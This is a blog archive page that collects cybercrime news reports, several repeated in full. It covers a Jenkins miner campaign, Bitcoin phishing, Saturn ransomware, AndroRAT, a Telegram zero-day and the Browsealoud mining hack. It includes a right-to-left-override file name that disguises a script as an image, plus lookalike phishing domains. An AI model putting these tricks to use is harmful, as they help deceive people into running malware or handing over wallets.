Category Archives: cyber crime

Security Affairs: JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers

Hacker Group Makes $3 Million by Installing Monero Miners on Jenkins Servers

A criminal organization has made $3.4 million by compromising Jenkins servers and installing a Monero cryptocurrency miner dubbed JenkinsMiner.

“The perpetrator, allegedly of Chinese origin, has been running the XMRig miner on many versions of Windows, and has already secured him over $3 million worth of Monero crypto-currency. As if that wasn’t enough though, he has now upped his game by targeting the powerful Jenkins CI server, giving him the capacity to generate even more coins.” states a blog post published by CheckPoint.

Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community.

The automation server supports developers build, test and deploy their applications, it has more than 133,000 active installations worldwide with more than 1 million users.

Jenkins servers

According to the researchers, threat actors behind the massive mining operation were leveraging the CVE-2017-1000353 RCE vulnerability in the Jenkins Java deserialization implementation.

The vulnerability is due to lack of validation of the serialized object, its exploitation allowed the attackers to make Jenkins servers download and install the JenkinsMiner.

“The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions, and it seems like most of the victims so far are personal computers. With every campaign, the malware has gone through several updates and the mining pool used to transfer the profits is also changed.” continues the post.

Most of the downloads for the JenkinsMiner are from IP address located in China and assigned to the Huaian government information center, of course, we are not able to determine if the server was compromised or explicitly used by state-sponsored hackers.

Jenkinminer

Further details and IoCs are included in the analysis published by CheckPoint.

In January, security expert Mikail Tunç analyzed Jenkins servers exposed online discovering that many instances leak sensitive information.

Tunç highlighted that Jenkins typically requires credentials to the code repository and access to an environment in which to deploy the code, usually GitHub, AWS, and Azure. Failure to configure the application correctly can expose data to serious risk.

The researcher discovered that many misconfigured systems provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account.

Pierluigi Paganini

(Security Affairs – JenkinsMiner, Monero cryptocurrency miner)

The post JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers appeared first on Security Affairs.



Security Affairs

JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers

Hacker Group Makes $3 Million by Installing Monero Miners on Jenkins Servers

A criminal organization has made $3.4 million by compromising Jenkins servers and installing a Monero cryptocurrency miner dubbed JenkinsMiner.

“The perpetrator, allegedly of Chinese origin, has been running the XMRig miner on many versions of Windows, and has already secured him over $3 million worth of Monero crypto-currency. As if that wasn’t enough though, he has now upped his game by targeting the powerful Jenkins CI server, giving him the capacity to generate even more coins.” states a blog post published by CheckPoint.

Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community.

The automation server supports developers build, test and deploy their applications, it has more than 133,000 active installations worldwide with more than 1 million users.

Jenkins servers

According to the researchers, threat actors behind the massive mining operation were leveraging the CVE-2017-1000353 RCE vulnerability in the Jenkins Java deserialization implementation.

The vulnerability is due to lack of validation of the serialized object, its exploitation allowed the attackers to make Jenkins servers download and install the JenkinsMiner.

“The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions, and it seems like most of the victims so far are personal computers. With every campaign, the malware has gone through several updates and the mining pool used to transfer the profits is also changed.” continues the post.

Most of the downloads for the JenkinsMiner are from IP address located in China and assigned to the Huaian government information center, of course, we are not able to determine if the server was compromised or explicitly used by state-sponsored hackers.

Jenkinminer

Further details and IoCs are included in the analysis published by CheckPoint.

In January, security expert Mikail Tunç analyzed Jenkins servers exposed online discovering that many instances leak sensitive information.

Tunç highlighted that Jenkins typically requires credentials to the code repository and access to an environment in which to deploy the code, usually GitHub, AWS, and Azure. Failure to configure the application correctly can expose data to serious risk.

The researcher discovered that many misconfigured systems provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account.

Pierluigi Paganini

(Security Affairs – JenkinsMiner, Monero cryptocurrency miner)

The post JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers appeared first on Security Affairs.

COINHOARDER criminal gang made an estimated $50 million with a Bitcoin phishing campaign

Researchers with Cisco Talos have monitored a bitcoin phishing campaign conducted by a criminal gang tracked as Coinhoarder that made an estimated $50 million by exploiting Google AdWords.

Researchers with Cisco Talos have monitored a bitcoin phishing campaign for several months with the help of the Ukraine Cyberpolice.

The gang, tracked as Coinhoarder, has made an estimated $50 million by exploiting Google AdWords to trick netizens into visiting Bitcoin phishing sites. This is the element that characterized this phishing campaign, Coinhoarder attackers used geo-targeting filters for their ads, the researchers noticed that hackers were targeting mostly Bitcoin owners in Africa.

The Ukrainian authorities located and shut down the servers hosting some of the phishing websites used by crooks. The phishing sites were hosted on the servers of a bulletproof hosting provider located in Ukraine, Highload Systems. The operation was temporarily disrupted but the police haven’t arrested any individual.

“Cisco has been tracking a bitcoin theft campaign for over 6 months. The campaign was discovered internally and researched with the aid of an intelligence sharing partnership with Ukraine Cyberpolice. The campaign was very simple and after initial setup the attackers needed only to continue purchasing Google AdWords to ensure a steady stream of victims.” reads the analysis published by Talos. “This campaign targeted specific geographic regions and allowed the attackers to amass millions in revenue through the theft of cryptocurrency from victims.”

The Coinhoarder group used Google Adwords for black SEO purposes, on February 24, 2017, researchers at Cisco observed a massive phishing campaign hosted in Ukraine targeting the popular Bitcoin wallet site blockchain.info with over 200,000 client queries. Crooks used Google Adwords to poison user search results in order to steal users’ wallets.

Unfortunately, this attack scheme is becoming quite common in the criminal ecosystem, hackers implement it to target many different crypto wallets and exchanges via malicious ads.

The COINHOARDER gang leveraged the typosquatting technique, the hackers used domains imitating the Blockchain.info Bitcoin wallet service in conjunction SSL signed phishing sites in order to appear as legitimate. Based on the number of queries, the researchers confirmed that this is one of the biggest campaigns targeting Blockchain.info to date.

“The COINHOARDER group has made heavy use of typosquatting and brand spoofing in conjunction SSL signed phishing sites in order to appear convincing. We have also observed the threat actors using internationalized domain names.” continues the analysis. “These domains are used in what are called homograph attacks, where an international letter or symbol looks very similar to one in English. Here are some examples from this campaign. 

The Punycode (internationalized) version is on the left, the translated (homographic) version on the right:

xn–blockchan-d5a[.]com → blockchaìn[.]com

xn–blokchan-i2a[.]info → blokchaín[.]info”

Talos researchers revealed that one campaign that was conducted between September and December 2017, the group made around $10 million.

“While working with Ukraine law enforcement, we were able to identify the attackers’ Bitcoin wallet addresses and thus, we could track their activity for the period of time between September 2017 to December 2017. In this period alone, we quantified around $10M was stolen.In one specific run, they made $2M within 3.5 week period. ” states Cisco Talos.

Further technical details on the campaign, including Indicators of Compromise are included in the analysis published by Cisco Talos.

Pierluigi Paganini

(Security Affairs – Coinhoarder, Bitcoin phishing campaign)

The post COINHOARDER criminal gang made an estimated $50 million with a Bitcoin phishing campaign appeared first on Security Affairs.

Security Affairs: Researchers spotted a new malware in the wild, the Saturn Ransomware

Researchers at the MalwareHunterTeam spotted a new strain of ransomware called Saturn Ransomware, the name derives from the .saturn extension it appends to the name of the encrypted files.

Currently, the malware requests victims of $300 USD payment that doubles after 7 days.

Once infected a system, the Saturn Ransomware checks if it is running in a virtual environment and eventually it halts the execution to avoid being analyzed by researchers.

Then it performs a series of actions to make impossible for the victims restoring the encrypted files, it deletes shadow volume copies, disables Windows startup repair, and to clear the Windows backup catalog.

Below the command executed by the malicious code:


At this point, the Saturn ransomware is ready to encrypt files having certain file types.

The ransomware such as many other threats uses a Tor payment site that is reported in the ransom note dropped on the machine while the Saturn ransomware is encrypting the files.

“While encrypting the computer, Saturn Ransomware will drop ransom notes named #DECRYPT_MY_FILES#.html and #DECRYPT_MY_FILES#.txt and a key file named #KEY-[id].KEY in each folder that it encrypts a file. The key file is used to login to the TOR ransom site, while the ransom note contains brief information on what has happened to the victims files and a link to the TOR payment site at su34pwhpcafeiztt.onion.” wrote Larwrence Abrams from Bleeping Computer.

Saturn Ransomware

File encrypted by the Saturn Ransomware (Source Bleeping computer)

The Saturn ransomware also drops a #DECRYPT_MY_FILES#.vbs triggers an audio message to the victims, and it sets your Windows desktop background to  #DECRYPT_MY_FILES.BMP.

The authentication to TOR site is made by uploading the key file, then users will display the Saturn Decryptor page for the victim that includes detailed instructions.

Researchers are still analyzing the Saturn ransomware, even if it is being actively distributed, it is still unclear what distribution vector threat actors are using to spread it.

Further information, including the Indicators of compromise (IoCs), are available in the blog post published by Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Saturn, cybercrime)

The post Researchers spotted a new malware in the wild, the Saturn Ransomware appeared first on Security Affairs.



Security Affairs

Researchers spotted a new malware in the wild, the Saturn Ransomware

Researchers at the MalwareHunterTeam spotted a new strain of ransomware called Saturn Ransomware, the name derives from the .saturn extension it appends to the name of the encrypted files.

Currently, the malware requests victims of $300 USD payment that doubles after 7 days.

Once infected a system, the Saturn Ransomware checks if it is running in a virtual environment and eventually it halts the execution to avoid being analyzed by researchers.

Then it performs a series of actions to make impossible for the victims restoring the encrypted files, it deletes shadow volume copies, disables Windows startup repair, and to clear the Windows backup catalog.

Below the command executed by the malicious code:


At this point, the Saturn ransomware is ready to encrypt files having certain file types.

The ransomware such as many other threats uses a Tor payment site that is reported in the ransom note dropped on the machine while the Saturn ransomware is encrypting the files.

“While encrypting the computer, Saturn Ransomware will drop ransom notes named #DECRYPT_MY_FILES#.html and #DECRYPT_MY_FILES#.txt and a key file named #KEY-[id].KEY in each folder that it encrypts a file. The key file is used to login to the TOR ransom site, while the ransom note contains brief information on what has happened to the victims files and a link to the TOR payment site at su34pwhpcafeiztt.onion.” wrote Larwrence Abrams from Bleeping Computer.

Saturn Ransomware

File encrypted by the Saturn Ransomware (Source Bleeping computer)

The Saturn ransomware also drops a #DECRYPT_MY_FILES#.vbs triggers an audio message to the victims, and it sets your Windows desktop background to  #DECRYPT_MY_FILES.BMP.

The authentication to TOR site is made by uploading the key file, then users will display the Saturn Decryptor page for the victim that includes detailed instructions.

Researchers are still analyzing the Saturn ransomware, even if it is being actively distributed, it is still unclear what distribution vector threat actors are using to spread it.

Further information, including the Indicators of compromise (IoCs), are available in the blog post published by Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Saturn, cybercrime)

The post Researchers spotted a new malware in the wild, the Saturn Ransomware appeared first on Security Affairs.

Unknown hackers stole $6 million from a Russian bank via SWIFT system last year

A new attack against the SWIFT system made the headlines again, unknown hackers have stolen 339.5 million roubles (roughly $6 million) from a Russian bank last year.

The news of the attack against the international payments messaging system was reported on Friday by the Russian central bank, this is the last incident of a long string of cyber heists.

“The volume of unsanctioned operations as a result of this attack amounted to 339.5 million roubles,” states the Russian central bank.

“The central bank said it had been sent information about “one successful attack on the work place of a SWIFT system operator.” reported the Reuters agency.

The spokesman did not provide details about the attack, he quoted Artem Sychev, deputy head of the central bank’s security department, as saying the hackers implemented “a common scheme”.

“When a case of potential fraud is reported to us, we offer our assistance to the affected user to help secure its environment,” said Natasha de Teran, a spokeswoman for SWIFT.

SWIFT Taiwan bank hach

SWIFT highlighted that its “own systems” have never been compromised by attackers in past attacks.

“Brussels-based SWIFT said late last year digital heists were becoming increasingly prominent as hackers use more sophisticated tools and techniques to launch new attacks.” continues the Reuters.

This isn’t the only cyber attacks against a Russian bank that attempted to steal money through the SWIFT system, in December, hackers tried to steal 55 million roubles from Russian state bank Globex.

The string of attacks began with the cyber attack against Bangladesh Bank in February 2016 that resulted in the theft of $81 million.

Even if the SWIFT hasn’t revealed the exact number of victims of the SWIFT hackers, details on some attacks were revealed, such as the attack on Taiwan’s Far Eastern International Bank.

Pierluigi Paganini

(Security Affairs – Russia, Russian central bank)

The post Unknown hackers stole $6 million from a Russian bank via SWIFT system last year appeared first on Security Affairs.

Security Affairs: Unknown hackers stole $6 million from a Russian bank via SWIFT system last year

A new attack against the SWIFT system made the headlines again, unknown hackers have stolen 339.5 million roubles (roughly $6 million) from a Russian bank last year.

The news of the attack against the international payments messaging system was reported on Friday by the Russian central bank, this is the last incident of a long string of cyber heists.

“The volume of unsanctioned operations as a result of this attack amounted to 339.5 million roubles,” states the Russian central bank.

“The central bank said it had been sent information about “one successful attack on the work place of a SWIFT system operator.” reported the Reuters agency.

The spokesman did not provide details about the attack, he quoted Artem Sychev, deputy head of the central bank’s security department, as saying the hackers implemented “a common scheme”.

“When a case of potential fraud is reported to us, we offer our assistance to the affected user to help secure its environment,” said Natasha de Teran, a spokeswoman for SWIFT.

SWIFT Taiwan bank hach

SWIFT highlighted that its “own systems” have never been compromised by attackers in past attacks.

“Brussels-based SWIFT said late last year digital heists were becoming increasingly prominent as hackers use more sophisticated tools and techniques to launch new attacks.” continues the Reuters.

This isn’t the only cyber attacks against a Russian bank that attempted to steal money through the SWIFT system, in December, hackers tried to steal 55 million roubles from Russian state bank Globex.

The string of attacks began with the cyber attack against Bangladesh Bank in February 2016 that resulted in the theft of $81 million.

Even if the SWIFT hasn’t revealed the exact number of victims of the SWIFT hackers, details on some attacks were revealed, such as the attack on Taiwan’s Far Eastern International Bank.

Pierluigi Paganini

(Security Affairs – Russia, Russian central bank)

The post Unknown hackers stole $6 million from a Russian bank via SWIFT system last year appeared first on Security Affairs.



Security Affairs

2 Billion Files Leaked in US Data Breaches in 2017

Nearly 2 billion files containing the personal data of US citizens were leaked last year—and that number could be significantly underreported.In 2017, a total of 551 breaches affected organizations, with

The post 2 Billion Files Leaked in US Data Breaches in 2017 appeared first on The Cyber Security Place.

Financial Services Sector Breaches Triple in Five Years

Financial services firms are targeted more than any other sector, with breaches tripling over the past five years, according to the latest report from Accenture.The consultancy conducted over 2100 interviews

The post Financial Services Sector Breaches Triple in Five Years appeared first on The Cyber Security Place.

Cyber security leaders concerned about sharp rise in digital threats

The lack of internal resources and exploding cybercrime is creating a ‘perfect storm’ for CISOs and their teams RiskIQ, the digital threat management firm, has announced the release of its

The post Cyber security leaders concerned about sharp rise in digital threats appeared first on The Cyber Security Place.

Financial services firms most adept at making balanced security investments

Cyber attacks cost financial services firms more to address and contain than in any other industry, and the rate of breaches in the industry has tripled over the past five

The post Financial services firms most adept at making balanced security investments appeared first on The Cyber Security Place.

Security Affairs: A new variant of the dreaded AndroRAT malware appeared in threat landscape

Security researchers from Trend Micro detected a new variant of the popular AndroRAT Android RAT in the criminal ecosystem.

Security experts from Trend Micro reported the availability of a new variant of the popular AndroRAT.

The malware was first born in 2012 as a university project, designed as an open-source client/server application to offer remote control of a device. Unfortunately, hackers noticed the capabilities of the threat and started using it.

The new version includes the code to trigger the CVE-2015-1805, it is a local elevation of privilege flaw that affects the kernel of the Android OS of certain devices.

The vulnerability is ranked as critical and can be exploited by rooting applications that users have installed on their devices to elevate privileges and run arbitrary code on the vulnerable device.

The security flaw is very old, it was discovered in the upstream Linux kernel years ago and fixed in April 2014. Unfortunately, the flaw was underestimated until last early 2016 when the C0RE Team reported to Google that it was possible to exploit it to target the Android OS.

All unpatched Android devices running OS based on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable to the CVE-2015-1805 vulnerability.

“Trend Micro detected a new variant of Android Remote Access Tool (AndroRAT) (identified as ANDROIDOS_ANDRORAT.HRXC) that has the ability to inject root exploits to perform malicious tasks such as silent installation, shell command execution, WiFi password collection, and screen capture.” states the analysis published by Trend Micro.

The new AndroRAT variant masquerades as a utility app called TrashCleaner that is likely delivered from a malicious URL. Once launched, the TrashCleaner will prompt the user to install a Chinese-labeled calculator app, hide its icon from the device’s UI, and activates the RAT in the background.

AndroRAT

The new variant included the following additional features:

  • Theft of mobile network information, storage capacity, rooted or not
  • Theft of list of installed applications
  • Theft of web browsing history from pre-installed browsers
  • Theft of calendar events
  • Record calls
  • Upload files to victim device
  • Use front camera to capture high resolution photos
  • Delete and send forged SMS
  • Screen capture
  • Shell command execution
  • Theft of WiFi passwords
  • Enabling accessibility services for a key logger silently

Experts recommend downloading apps only from official stores and keeping updated the OS and the apps.

Pierluigi Paganini

(Security Affairs – AndroRAT  CVE-2015-1805)

The post A new variant of the dreaded AndroRAT malware appeared in threat landscape appeared first on Security Affairs.



Security Affairs

A new variant of the dreaded AndroRAT malware appeared in threat landscape

Security researchers from Trend Micro detected a new variant of the popular AndroRAT Android RAT in the criminal ecosystem.

Security experts from Trend Micro reported the availability of a new variant of the popular AndroRAT.

The malware was first born in 2012 as a university project, designed as an open-source client/server application to offer remote control of a device. Unfortunately, hackers noticed the capabilities of the threat and started using it.

The new version includes the code to trigger the CVE-2015-1805, it is a local elevation of privilege flaw that affects the kernel of the Android OS of certain devices.

The vulnerability is ranked as critical and can be exploited by rooting applications that users have installed on their devices to elevate privileges and run arbitrary code on the vulnerable device.

The security flaw is very old, it was discovered in the upstream Linux kernel years ago and fixed in April 2014. Unfortunately, the flaw was underestimated until last early 2016 when the C0RE Team reported to Google that it was possible to exploit it to target the Android OS.

All unpatched Android devices running OS based on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable to the CVE-2015-1805 vulnerability.

“Trend Micro detected a new variant of Android Remote Access Tool (AndroRAT) (identified as ANDROIDOS_ANDRORAT.HRXC) that has the ability to inject root exploits to perform malicious tasks such as silent installation, shell command execution, WiFi password collection, and screen capture.” states the analysis published by Trend Micro.

The new AndroRAT variant masquerades as a utility app called TrashCleaner that is likely delivered from a malicious URL. Once launched, the TrashCleaner will prompt the user to install a Chinese-labeled calculator app, hide its icon from the device’s UI, and activates the RAT in the background.

AndroRAT

The new variant included the following additional features:

  • Theft of mobile network information, storage capacity, rooted or not
  • Theft of list of installed applications
  • Theft of web browsing history from pre-installed browsers
  • Theft of calendar events
  • Record calls
  • Upload files to victim device
  • Use front camera to capture high resolution photos
  • Delete and send forged SMS
  • Screen capture
  • Shell command execution
  • Theft of WiFi passwords
  • Enabling accessibility services for a key logger silently

Experts recommend downloading apps only from official stores and keeping updated the OS and the apps.

Pierluigi Paganini

(Security Affairs – AndroRAT  CVE-2015-1805)

The post A new variant of the dreaded AndroRAT malware appeared in threat landscape appeared first on Security Affairs.

Hackers in the Russian underground exploited a Telegram Zero-Day vulnerability to deliver malware

Security researcher Alexey Firsh at Kaspersky Lab last discovered a Telegram zero-day in the desktop Windows version that was exploited in attacks in the wild.

Security researcher Alexey Firsh at Kaspersky Lab last discovered a zero-day vulnerability in the desktop Windows version of the popular Telegram instant messaging app.

The bad news is that the Telegram zero-day flaw was being exploited by threat actors in the wild to deliver cryptocurrency miners for Monero and ZCash.

According to the expert, hackers have actively exploited the vulnerability since at least March 2017. Attackers tricked victims into downloading cryptocurrency miners or to establish a backdoor.

“In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.” reads the analysis of the expert.

The flaw is related to the way Telegram Windows client handles the RLO (right-to-left override) Unicode character (U+202E), which is used for any language that uses a right to left writing mode, like Arabic or Hebrew.

The attackers used a hidden RLO Unicode character in the file name that reversed the order of the characters, in this way the file name could be renamed. In a real attack scenario, then the attackers sent the file to the target recipient.

The crooks craft a malicious code to be sent in a message, let assume it is a JS file that is renamed as follows:

evil.js -> photo_high_re*U+202E*gnp.js  (— *U+202E* is the RLO character)

The RLO character included in the file name is used by an attacker to display the string gnp.js in reverse masquerading the fact that the file is a js and tricking the victims into believing that it is a harmless .png image.

Telegram zero-day

When the user clicks on the file, Windows displays a security notification if it hasn’t been disabled in the system’s settings.

telegram zero-day

If the user ignores the notification and clicks on ‘Run’, the malicious code executed.

The expert reported the Telegram zero-day to the company that promptly patched the flaw.

“Kaspersky Lab reported the vulnerability to Telegram and, at the time of publication, the zero-day flaw has not since been observed in messenger’s products.” states the analysis published by Kaspersky.

“During their analysis, Kaspersky Lab experts identified several scenarios of zero-day exploitation in the wild by threat actors.”

The analysis of the servers used by the attackers revealed the presence of archives containing a Telegram’s local cache, this means that threat actors exploited the flaw to steal data from the victims.

In another attack scenario, crooks triggered the flaw to install a malware that leverages the Telegram API as a command and control mechanism.

“Secondly, upon successful exploitation of the vulnerability, a backdoor that used the Telegram API as a command and control protocol was installed, resulting in the hackers gaining remote access to the victim’s computer. After installation, it started to operate in a silent mode, which allowed the threat actor to remain unnoticed in the network and execute different commands including the further installation of spyware tools.” continues the analysis.

According to the researcher, the flaw was known only in the Russia crime community, it was not triggered by other crooks.

To mitigate the attack, download and open files only from trusted senders.

The security firm also recommended users to avoid sharing any sensitive personal information in messaging apps and make sure to have a good antivirus software from reliable company installed on your systems.

 

Pierluigi Paganini

(Security Affairs – Telegram Zero-Day, hacking)

The post Hackers in the Russian underground exploited a Telegram Zero-Day vulnerability to deliver malware appeared first on Security Affairs.

Security Affairs: Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in seasonal campaigns of Valentine’s Day-themed spam emails.

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in the activity of the infamous botnet.

Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April 2017. The Necurs botnet was used in the past months to push many other malware, including LockyJaffGlobeImposterDridex , Scarab and the Trickbot.

Scammers are mow using the Necurs botnet to send out an amazing number of messages offering companionship waiting for Valentine’s day.

Crooks are using the spam messages to trick victims into sharing personal photos that are used later by cybercriminals to blackmail the victims.

According to the IBM X-Force team, the campaign started in mid-January, it leverages the overall Necurs botnet that is composed of 6 million bots.

“The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.” reads the analysis published by X-Force researchers.

The expert spotted two current campaigns that sent out a total 230 million spam messages in 14 days-period.

necurs spammers valentines day

 

The first campaign reached a peak between Jan. 16 and Jan. 18 and the second one began on Jan. 27 and lasted through Feb. 3. Researchers observed an average 30 million spam messages were sent each day.

“Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.” continues the analysis.”

The experts determined that the spam messages are being sent from about 950,000 unique IP addresses, Most of IP are hosted in Vietnam and India while the top sender IP address is hosted via a Pakistani-based ISP.

“Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.” added the researchers.

After the takedowns of the Andromeda and Avalanche botnets, Necurs remains the largest spam distributor in the cybercrime ecosystem. Crooks will continue to leverage the Necurs botnet for their spam campaigns, for this reason, the most effective countermeasure is to increase employee awareness on such kind of threats.

 

Pierluigi Paganini

(Security Affairs – Necurs botnet, Valentine’s Day)

The post Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam appeared first on Security Affairs.



Security Affairs

Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in seasonal campaigns of Valentine’s Day-themed spam emails.

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in the activity of the infamous botnet.

Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April 2017. The Necurs botnet was used in the past months to push many other malware, including LockyJaffGlobeImposterDridex , Scarab and the Trickbot.

Scammers are mow using the Necurs botnet to send out an amazing number of messages offering companionship waiting for Valentine’s day.

Crooks are using the spam messages to trick victims into sharing personal photos that are used later by cybercriminals to blackmail the victims.

According to the IBM X-Force team, the campaign started in mid-January, it leverages the overall Necurs botnet that is composed of 6 million bots.

“The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.” reads the analysis published by X-Force researchers.

The expert spotted two current campaigns that sent out a total 230 million spam messages in 14 days-period.

necurs spammers valentines day

 

The first campaign reached a peak between Jan. 16 and Jan. 18 and the second one began on Jan. 27 and lasted through Feb. 3. Researchers observed an average 30 million spam messages were sent each day.

“Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.” continues the analysis.”

The experts determined that the spam messages are being sent from about 950,000 unique IP addresses, Most of IP are hosted in Vietnam and India while the top sender IP address is hosted via a Pakistani-based ISP.

“Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.” added the researchers.

After the takedowns of the Andromeda and Avalanche botnets, Necurs remains the largest spam distributor in the cybercrime ecosystem. Crooks will continue to leverage the Necurs botnet for their spam campaigns, for this reason, the most effective countermeasure is to increase employee awareness on such kind of threats.

 

Pierluigi Paganini

(Security Affairs – Necurs botnet, Valentine’s Day)

The post Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam appeared first on Security Affairs.

Victims of the current version of the Cryakl ransomware can decrypt their files for free

Free decryption keys for the Cryakl ransomware were added to the free Rakhni Decryptor that could be downloaded on the NoMoreRansom website.

The Belgian Federal Police has located the command and control server used by a criminal organization behind the Cryakl ransomware. The server was located in an unspecified neighboring country, law enforcement seized it and shared the decryption keys found on the machine with the No More Ransom project.

“The Belgian Federal Police is releasing free decryption keys for the Cryakl ransomware today, after working in close cooperation with Kaspersky Lab. The keys were obtained during an ongoing investigation; by sharing the keys with No More Ransom the Belgian Federal Police becomes a new associated partner of the project – the second law enforcement agency after the Dutch National Police.” reads the statement published by the Europol.

“Led by the federal prosecutor’s office, the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys. Kaspersky Lab provided technical expertise to the Belgian federal prosecutor and has now added these keys to the No More Ransom portal on behalf of the Belgian federal police. This will allow victims to regain access to their encrypted files without having to pay to the criminals.”

The “exponential” rise in Ransomware threat represents a serious problem for users online and it is a profitable business for cyber criminals. The operation NO More Ransom is the response of the Europol of the growing threat.

Cryakl ransomware

Victims of Cryakl ransomware can recover encrypted files using the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom at the following URL.

The tool works with most versions of the Cryakl ransomware, but researchers at MalwareHunterTeam confirmed that it doesn’t work with versions newer than CL 1.4.0.

It has been estimated that the tool has helped more than 35,000 victims of ransomware to decrypt their files for free, an overall loss for crooks of over €10m.

“There are now 52 free decryption tools on www.nomoreransom.org, which can be used to decrypt 84 ransomware families. CryptXXX, CrySIS and Dharma are the most detected infections.” continues the statement.

The Belgian authorities are still investigating the case.

 

Pierluigi Paganini

(Security Affairs – Cryakl ransomware, cybercrime)

The post Victims of the current version of the Cryakl ransomware can decrypt their files for free appeared first on Security Affairs.

49% of crypto mining scripts are deployed on pornographic related websites

The number of crypto mining scripts discovered by security experts continues to increase, especially those ones illegally deployed by hacking servers online.

The experts from Qihoo 360’s Netlab analyzed crypto mining scripts online by analyzing DNS traffic with its DNSMon system. The experts were able to determine which sites load the scripts from domains associated with in-browser mining services.

According to the researchers, 49% of crypto mining scripts are deployed on pornographic related websites.

The study revealed that cryptocurrency mining scripts are also deployed on fraud sites (8%), advertising domains (7%), and cryptocurrency mining (7%).

0.2% of websites have web mining code embedded in the homepage : 241 (0.24%) in Alexa Top 100,000 websites, 629 (0.21%) in Alexa Top 300,000 websites” reads the analysis published by NetLab. 

“Pornographic related websites are the main body , accounting for 49% of these websites. Others include fraud (8%), advertising (7%), mining (7%), film and television (6%) and other categories”

The most used crypto mining script is Coinhive (68%+10%), followed by JSEcoin (9%).

crypto currency mining scripts

The fact that cryptocurrency mining scripts are most deployed on porn websites is not a surprise because they have a large number of visitors that used to spend a lot of time watching their content.

Mining activities online are rapidly increasing, the following graph shows the mining site DNS traffic trends:

crypto currency mining scropts 2.png

Below the categories of new actors most involved in mining activities:

  • Advertisers : The mining activity of some websites is introduced by the advertisers’ external chains
  • Shell link : Some websites will use a “shell link” to obscure the mining site link in the source code
  • Short domain name service provider : goobo . COM .br Brazil is a short domain name service provider, the website home page, including a short domain name through the service generated when access to the link will be loaded coinhive mining
  • Supply chain contamination : the WWW . Midijs . NET is a JS-based MIDI file player, website source code used in mining to coinhive
  • Self-built pool : Some people in github open source code , can be used to build from the pool
  • Web users informed mining : authedmine . COM is emerging of a mining site, the site claims that only a clear case of known and authorized users, began mining
 

Pierluigi Paganini

(Security Affairs – crypto currency mining scripts, Monero)

The post 49% of crypto mining scripts are deployed on pornographic related websites appeared first on Security Affairs.

Security Affairs: Thousands of websites worldwide hijacked by cryptocurrency mining code due Browsealoud plugin hack

Thousands of websites worldwide hijacked by a cryptocurrency mining code due to the hack of the popular Browsealoud plugin.

A massive attack hit thousands of websites around the world, crooks deployed Coinhive scripts forcing them to secretly mine cryptocurrencies on visitors’ browsers.

The list of compromised websites (4275) includes the UK’s NHS, Information Commissioner’s Office (ICO) (ico.org.uk), the UK’s Student Loans Company (slc.co.uk), The City University of New York (cuny.edu), and the US government’s court system.

Once discovered the hack some sites web down, the ICO also took its website down.

The compromised websites use the Browsealoud plugin which makes their content accessible for blind or partially sighted people by reading it.

In a time-window of roughly seven hours (between 0300 and 1145 UTC), all the websites using Browsealoud inadvertently ran the Monero cryptocurrency mining code.

The attackers injected an obfuscated version of the mining code in the plugin that once converted from hexadecimal back to ASCII allowed to load the mining code in the webpage.

cryptocurrency mining script obfuscated_mining_code

The alarm was thrown by the security expert Scott Helme who was contacted by a friend who sent him antivirus software warnings received after visiting a UK ICO website.

“This type of attack isn’t new – but this is the biggest I’ve seen. A single company being hacked has meant thousands of sites impacted across the UK, Ireland and the United States.said Helme.

“Someone just messaged me to say their local government website in Australia is using the software as well.”

The expert suggests using the Subresource Integrity (SRI) technique to block unwanted code injected in affected websites.

Texthelp, the company that developed the Browsealoud plugin, has removed its Browsealoud code from the web to stop the cryptocurrency mining operation.

“In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year and our data security action plan was actioned straight away,” said Texthelp’s chief technology officer Martin McKay in a statement.

“Texthelp has in place continuous automated security tests for Browsealoud, and these detected the modified file and as a result the product was taken offline.”

